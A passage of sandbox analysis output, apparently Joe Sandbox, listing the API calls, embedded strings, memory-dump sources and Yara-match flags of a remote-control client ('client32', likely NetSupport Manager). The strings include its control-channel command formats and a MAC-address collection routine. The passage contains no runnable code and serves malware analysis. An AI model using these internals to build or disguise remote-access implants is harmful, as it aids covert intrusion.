                                                                                                • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                APIs
                                                                                                  • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,986DAFD2,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 1101B776
                                                                                                • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                                • LoadLibraryA.KERNEL32(NSSecurity.dll), ref: 1101B7AE
                                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                Strings
                                                                                                • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                • NSSecurity.dll, xrefs: 1101B7A3
                                                                                                • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                • API String ID: 3515807602-1044166025
                                                                                                • Opcode ID: dde21e9f02bc989f84a52648ab5cfdb9b440b3ebe83e5bdf3d238e24019c4138
                                                                                                • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                                • Opcode Fuzzy Hash: dde21e9f02bc989f84a52648ab5cfdb9b440b3ebe83e5bdf3d238e24019c4138
                                                                                                • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _memset$_free_memmove
                                                                                                • String ID: MSG$SENDER
                                                                                                • API String ID: 3114187808-3313591108
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF5CBF
                                                                                                  • Part of subcall function 69CF33A0: wsprintfA.USER32 ref: 69CF34FD
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                • String ID: 445817$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
                                                                                                • API String ID: 2968883096-1650465934
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D0A
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D72
                                                                                                • SetLastError.KERNEL32(00000078,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6DCC
                                                                                                • SetLastError.KERNEL32(00000078,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6DD6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                • API String ID: 199729137-1434219782
                                                                                                APIs
                                                                                                • _strtok.LIBCMT ref: 69CEB941
                                                                                                • _free.LIBCMT ref: 69CEB952
                                                                                                • _malloc.LIBCMT ref: 69CEB970
                                                                                                • _free.LIBCMT ref: 69CEB999
                                                                                                • _strtok.LIBCMT ref: 69CEB9A5
                                                                                                  • Part of subcall function 69CF7F80: _memset.LIBCMT ref: 69CF7F9F
                                                                                                  • Part of subcall function 69CF7F80: LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 69CF7FAC
                                                                                                  • Part of subcall function 69CF7F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo,?,?,00000000,?,?,?,?,?,?,?,?,69CEB916,?,00000100), ref: 69CF7FCB
                                                                                                  • Part of subcall function 69CF7F80: _malloc.LIBCMT ref: 69CF7FFB
                                                                                                  • Part of subcall function 69CF7F80: wsprintfA.USER32 ref: 69CF807C
                                                                                                  • Part of subcall function 69CF7F80: _free.LIBCMT ref: 69CF8110
                                                                                                  • Part of subcall function 69CF7F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 69CF811C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
                                                                                                • String ID: MACADDRESS=%s
                                                                                                • API String ID: 905297018-795797190
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                • _free.LIBCMT ref: 69CEBCBA
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEBCEC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
                                                                                                • API String ID: 3180605519-731630419
                                                                                                APIs
                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                                • IsWindow.USER32(?), ref: 1103D17E
                                                                                                • SendMessageA.USER32(?,0000004A,000103BC,00000492), ref: 1103D1B8
                                                                                                • _free.LIBCMT ref: 1103D1BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                                • String ID: Show16
                                                                                                • API String ID: 625148989-2844191965
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEAF0A
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEAF39
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
                                                                                                • String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
                                                                                                • API String ID: 1628406020-2994292602
                                                                                                APIs
                                                                                                • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                                • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 69D07960
                                                                                                  • Part of subcall function 69D0F4BC: __mtinitlocknum.LIBCMT ref: 69D0F4D2
                                                                                                  • Part of subcall function 69D0F4BC: __amsg_exit.LIBCMT ref: 69D0F4DE
                                                                                                  • Part of subcall function 69D0F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,69D06E81,0000000D), ref: 69D0F4E6
                                                                                                • InterlockedDecrement.KERNEL32(00000000,69D27328,00000008), ref: 69D07972
                                                                                                • _free.LIBCMT ref: 69D07987
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • __lock.LIBCMT ref: 69D079A0
                                                                                                • ___removelocaleref.LIBCMT ref: 69D079AF
                                                                                                • ___freetlocinfo.LIBCMT ref: 69D079C8
                                                                                                • _free.LIBCMT ref: 69D079E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID:
                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?,?,00000000,756F110C,?,1100BF9B,?,00000000,00000002), ref: 1100B350
                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                                  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B3B8
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                • _free.LIBCMT ref: 1100B3C8
                                                                                                • _free.LIBCMT ref: 1100B3CE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                • String ID:
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CFDA47
                                                                                                • CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 69CFDA6A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 69CFDA97
                                                                                                • CloseHandle.KERNEL32(?), ref: 69CFDAA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID: Refcount.cpp$hThread
                                                                                                APIs
                                                                                                • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                                • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,69D272D8,00000008,69D06F3F,00000000,00000000), ref: 69D06E48
                                                                                                • __lock.LIBCMT ref: 69D06E7C
                                                                                                  • Part of subcall function 69D0F4BC: __mtinitlocknum.LIBCMT ref: 69D0F4D2
                                                                                                  • Part of subcall function 69D0F4BC: __amsg_exit.LIBCMT ref: 69D0F4DE
                                                                                                  • Part of subcall function 69D0F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,69D06E81,0000000D), ref: 69D0F4E6
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 69D06E89
                                                                                                • __lock.LIBCMT ref: 69D06E9D
                                                                                                • ___addlocaleref.LIBCMT ref: 69D06EBB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID: KERNEL32.DLL
                                                                                                • API String ID: 637971194-2576044830
                                                                                                APIs
                                                                                                • LoadMenuA.USER32 ref: 1100339D
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                                • DestroyMenu.USER32 ref: 110033F2
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                • API String ID: 468487828-934300333
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 69D0A1D4
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __getptd.LIBCMT ref: 69D0A1E5
                                                                                                • __getptd.LIBCMT ref: 69D0A1F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 803148776-2671469338
                                                                                                APIs
                                                                                                • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                                • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                                • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11027614
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                                • String ID:
                                                                                                • API String ID: 2375713580-0
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 111715AE
                                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                • __amsg_exit.LIBCMT ref: 111715CE
                                                                                                • __lock.LIBCMT ref: 111715DE
                                                                                                • InterlockedDecrement.KERNEL32(?,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 111715FB
                                                                                                • _free.LIBCMT ref: 1117160E
                                                                                                • InterlockedIncrement.KERNEL32(021218E0,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 11171626
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                • String ID:
                                                                                                • API String ID: 3470314060-0
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 69D07A20
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __calloc_crt.LIBCMT ref: 69D07A2B
                                                                                                  • Part of subcall function 69D0D3F5: Sleep.KERNEL32(00000000,69D06F16,00000001,00000214), ref: 69D0D41D
                                                                                                • __lock.LIBCMT ref: 69D07A61
                                                                                                • ___addlocaleref.LIBCMT ref: 69D07A6D
                                                                                                • __lock.LIBCMT ref: 69D07A81
                                                                                                • InterlockedIncrement.KERNEL32(?,69D27350,0000000C), ref: 69D07A91
                                                                                                  • Part of subcall function 69D060F9: __getptd_noexit.LIBCMT ref: 69D060F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                • String ID:
                                                                                                • API String ID: 3803058747-0
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B3585
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B3598
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B35A5
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B35D0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$EventObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 2857295742-0
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,69CF3061,?), ref: 69CE69EB
                                                                                                • _free.LIBCMT ref: 69CE6A07
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE6A1B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_free
                                                                                                • String ID: FAILED_REASON$LICENSE
                                                                                                • API String ID: 2208350527-1913596546
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID: %s: $HTCTL32
                                                                                                • API String ID: 4139908857-3797952780
                                                                                                APIs
                                                                                                • MapWindowPoints.USER32 ref: 110773FB
                                                                                                  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                                • EqualRect.USER32 ref: 1107740C
                                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014), ref: 11077466
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11077447
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 2754115966-2830328467
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,986B9CC5), ref: 69CFFB04
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CFFB3E
                                                                                                • SetEvent.KERNEL32(?), ref: 69CFFB69
                                                                                                • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 69CFFBA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                                                • String ID: list<T> too long
                                                                                                • API String ID: 930337060-4027344264
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEBC16
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
                                                                                                • API String ID: 3180605519-89615960
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEBB46
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
                                                                                                • API String ID: 3180605519-2489130399
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 69CE2ACB
                                                                                                • _strrchr.LIBCMT ref: 69CE2ADA
                                                                                                • _strrchr.LIBCMT ref: 69CE2AEA
                                                                                                • wsprintfA.USER32 ref: 69CE2B05
                                                                                                  • Part of subcall function 69CE2CE0: GetModuleHandleA.KERNEL32(NSMTRACE,69CE2AB1), ref: 69CE2CFA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                • String ID: HTCTL32
                                                                                                • API String ID: 2529650285-1670862073
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE7E0E
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7EB7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7ED0
                                                                                                Strings
                                                                                                Memory Dump Source
